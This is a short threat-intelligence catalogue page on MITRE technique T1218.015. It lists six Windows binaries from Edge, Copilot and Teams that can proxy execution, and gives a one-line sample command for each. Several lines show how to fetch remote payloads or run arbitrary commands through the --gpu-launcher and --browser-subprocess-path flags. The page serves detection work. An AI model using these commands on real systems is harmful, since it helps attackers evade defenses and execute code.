T1218.015: Technique T1218.015
Adversaries may leverage living-off-the-land techniques (T1218.015) to achieve execution, evade defenses, or transfer tools.
Total Capable Binaries: 6
•
Windows: 6
•
Linux: 0
•
macOS: 0
Living-off-the-Land Matrix for T1218.015
Across 6 verified binariesWindows3 payloads
Msedge.exe
Microsoft Edge browser
Sample Attack Vector:
msedge.exe {REMOTEURL:.exe.txt}Windows4 payloads
msedgewebview2.exe
msedgewebview2.exe is the executable file for Microsoft Edge WebView2, which is a web browser control used by applications to display web content.
Sample Attack Vector:
msedgewebview2.exe --no-sandbox --browser-subprocess-path="{PATH_ABSOLUTE:.exe}"Windows2 payloads
msedge_proxy.exe
Microsoft Edge Browser
Sample Attack Vector:
C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe {REMOTEURL:.zip}Windows1 payloads
Mscopilot.exe
Microsoft Copilot app
Sample Attack Vector:
mscopilot.exe --no-startup-window --disable-gpu-sandbox --gpu-launcher="{CMD} && taskkill /f /im mscopilot.exe &&"Windows1 payloads
Mscopilot_proxy.exe
Microsoft Copilot proxy launcher
Sample Attack Vector:
mscopilot_proxy.exe --no-startup-window --disable-gpu-sandbox --gpu-launcher="cmd.exe /c calc.exe && taskkill /f /im mscopilot.exe &&"Windows3 payloads
Teams.exe
Electron runtime binary which runs the Teams application
Sample Attack Vector:
teams.exeCurated & Verified by
Sharon Ben Moshe
Cybersecurity Researcher & Detection Engineer • Check Point